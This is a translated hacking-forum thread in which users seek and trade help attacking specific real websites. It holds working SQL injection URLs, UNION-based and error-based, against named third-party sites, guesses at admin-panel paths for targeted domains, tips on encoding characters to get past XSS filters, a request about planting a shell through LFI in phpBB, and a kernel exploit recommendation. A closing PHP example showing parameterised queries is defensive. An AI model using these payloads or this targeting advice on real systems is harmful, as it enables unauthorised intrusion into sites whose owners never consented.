Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    and the admin panel?
    kitcom.ru/admin
     
  2. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    found it
    http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,name+from+groups
     
  3. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    here you go
     
    1 person likes this.
  4. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    thanks a lot
    --------------
    but when I log in it says the data is incorrect
     
  5. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    gave you everything there was
     
  6. AttackPro

    AttackPro New Member

    Joined:
    24 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    OK, thanks, I'm just curious
     
  7. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    help me find the admin panel

    http://www.karat-telecom.ru/
     
  8. Gedj

    Gedj Elder

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    http://www.karat-telecom.ru/Album/login.php

    http://www.karat-telecom.ru/Album/admin.php - У Вас нет прав для просмотра этой страницы.
     
    #14968 Gedj, 3 Oct 2010
    Last edited: 3 Oct 2010
    1 person likes this.
  9. The Elusive

    The Elusive New Member

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    I think you were looking for this =)
     
    1 person likes this.
  10. pinch

    pinch Elder

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+%28select+1+from+%28select+count%280%29,concat%28%28select+table_name+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--

    take it from here yourself...
     
    1 person likes this.
  11. moby.exe

    moby.exe New Member

    Joined:
    15 Sep 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    On the site, in the comments, the characters
    Code:
    < >
    are converted to
    Code:
    &lt;     &gt;
    and displayed as plain text. Is there any way to get around this?
     
    #14971 moby.exe, 3 Oct 2010
    Last edited: 4 Oct 2010
  12. The Elusive

    The Elusive New Member

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    2
    Reputations:
    1
    < > can be encoded like this.
    Code:
    %3C%20%3E
    URL
    Code:
    < &#x3E
    HTML
    Code:
    &#60&#32&#62
    Decimal
     
  13. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Where are avatars stored in phpBB? I have an LFI and the full path to the site, and I'm trying to load PHP code in the avatar's metadata, but it seems to be output through a script. Are avatars really saved straight into the DB? If so, how else can a shell be uploaded? Thanks
     
  14. boxazbox

    boxazbox Banned

    Joined:
    21 Sep 2010
    Messages:
    9
    Likes Received:
    3
    Reputations:
    6
    help me find the admin panel..
     
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    officepro.am/controlpanel/
    officepro.am/cpanel/
    officepro.am/kpanel/
     
    1 person likes this.
  16. stepashka_

    stepashka_ Motorcyclist

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Help me find an exploit for the kernel

     
  17. boxazbox

    boxazbox Banned

    Joined:
    21 Sep 2010
    Messages:
    9
    Likes Received:
    3
    Reputations:
    6
    probuy/
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    sock_sendpage() should work...
     
  19. asia555

    asia555 New Member

    Joined:
    25 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Is an SQL injection possible here?
    $query = 'SELECT nickname FROM users WHERE username ="' . htmlentities($_GET["username"],ENT_QUOTES, 'UTF-8') . '"';
    Thanks
     
  20. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Not possible.
     
    1 person likes this.
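
The lookup from asia555's post rewritten with a bound parameter, as an added example that is not part of the thread: the value never becomes part of the SQL text, and HTML encoding is applied only when the result is written into a page. The in-memory SQLite table, the sample rows and the `nickname_for` helper are assumptions made for the demonstration.

```php
<?php
// Constructed in-memory database standing in for the `users` table in the post.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, nickname TEXT)');

// Constructed sample rows; one username contains a quote, one nickname contains markup.
$seed = $db->prepare('INSERT INTO users (username, nickname) VALUES (?, ?)');
$seed->execute(["o'brien", 'Miles <chief>']);
$seed->execute(['alice', 'Al']);

// Hypothetical helper: the query from the post with a placeholder instead of
// string concatenation. The driver sends the value separately from the
// statement, so quote characters in the input cannot alter its structure.
function nickname_for(PDO $db, string $username): ?string
{
    $stmt = $db->prepare('SELECT nickname FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $nick = $stmt->fetchColumn();
    return $nick === false ? null : $nick;
}

// HTML-encoding the key before the lookup changes the data itself: the
// encoded form of a name containing a quote is a different string from the
// one stored, so a legitimate user is no longer found.
$encodedKey = htmlentities("o'brien", ENT_QUOTES, 'UTF-8');
var_dump($encodedKey === "o'brien");
var_dump(nickname_for($db, $encodedKey));

// With binding, the raw value matches its row, and input that contains
// quotes and SQL keywords is compared as an ordinary literal.
var_dump(nickname_for($db, "o'brien"));
var_dump(nickname_for($db, 'alice" OR "1"="1'));

// Output step: this is where HTML encoding belongs, so stored markup is
// rendered as text rather than interpreted by the browser.
$nick = nickname_for($db, "o'brien") ?? '';
echo htmlentities($nick, ENT_QUOTES, 'UTF-8'), "\n";
```

Running it requires the `pdo_sqlite` extension; against MySQL only the DSN changes, and emulated prepares can be switched off with `PDO::ATTR_EMULATE_PREPARES` set to `false`.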